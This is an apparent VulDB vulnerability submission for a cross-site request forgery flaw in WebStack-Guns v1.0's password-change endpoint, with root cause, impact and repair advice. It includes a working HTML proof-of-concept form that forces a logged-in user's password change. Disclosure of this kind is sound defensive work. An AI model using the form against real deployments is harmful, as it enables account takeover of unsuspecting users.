| Title | jsnjfz WebStack-Guns V1.0 Cross-Site Request Forgery |
|---|
| Description | WebStack-Guns v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /mgr/changePwd.
# **NAME OF AFFECTED PRODUCT(S)**
- WebStack-Guns
## Vendor Homepage
https://github.com/jsnjfz/WebStack-Guns
# **AFFECTED AND/OR FIXED VERSION(S)**
## Submitter
- aiyakami, Yveslawtox, luokuang1
## Vulnerable File
- UserMgrController.java
## VERSION(S)
- V1.0
## Software Link
- https://github.com/jsnjfz/WebStack-Guns
# **PROBLEM TYPE**
## Vulnerability Type
- CSRF (Cross-Site Request Forgery)
## Root Cause
- The application fails to verify the authenticity of requests that change user-sensitive data (e.g., account settings, password changes). An attacker can trick a logged-in user into submitting a forged request, which gets executed with the user's privileges, potentially altering sensitive data or performing unwanted actions without the user's consent.
## Impact
- Attackers can manipulate authenticated users into performing actions like changing passwords or modifying account settings, all without the user’s consent.
Successful exploitation can lead to:
- Unauthorized account access or data manipulation.
- Privilege escalation or unauthorized actions performed on behalf of the user.
- Potential data loss or unauthorized data leakage.
# **DESCRIPTION**
- During a security audit of WebStack-Guns, a critical CSRF vulnerability was identified in the UserMgrController.java file. The vulnerability allows an attacker to craft a malicious request that, when submitted by a logged-in user, can execute unintended actions like password change or profile updates.
# **Vulnerability details and POC**
## Vulnerable Location:
- `UserMgrController.java`
## Payload:
Example: A malicious attacker sends a crafted request to change the victim's password without their consent.
```html
<html>
<body>
<form action="http://localhost:8000/mgr/changePwd?jstime=1747794048307" method="POST" name="form1" enctype="application/x-www-form-urlencoded" >
<input type="hidden" name="rePwd" value="123456"/>
<input type="hidden" name="oldPwd" value="111111"/>
<input type="hidden" name="newPwd" value="123456"/>
<input type="submit" value="Submit request" />
</form>
<script>history.pushState('', '', '/');</script>
</body>
</html>
```
## The following are screenshots of some specific information obtained from testing and running with the yakit tool:
After removing the Referer field from the request packet and resubmitting, the request remains valid.
# Suggested repair
1. **Anti-CSRF Tokens**
Implement anti-CSRF tokens in all state-changing forms or actions (e.g., POST requests), ensuring that the server checks that the request is originating from a legitimate source.
2. **SameSite Cookies**
Ensure that cookies have the SameSite attribute set to Strict or Lax to mitigate cross-site request forgery attempts from different origins.
Referer Header Validation
Validate the Referer header for sensitive actions to ensure the request is coming from a trusted origin.
3. **Double Submit Cookies**
Use a second cookie that stores the CSRF token and validate that the value matches the token in the form submission.
Recommended Fix
Integrate an anti-CSRF solution (e.g., tokens, SameSite cookies) in all forms that involve state changes.
Ensure that sensitive actions require additional user verification (e.g., re-entering a password).
|
|---|
| Source | ⚠️ https://github.com/Aiyakami/CVE-1/issues/5 |
|---|
| User | aiyakami (UID 85128) |
|---|
| Submission | 05/21/2025 04:53 AM (2 months ago) |
|---|
| Moderation | 06/09/2025 08:10 AM (19 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 311659 [jsnjfz WebStack-Guns 1.0 cross-site request forgery] |
|---|
| Points | 20 |
|---|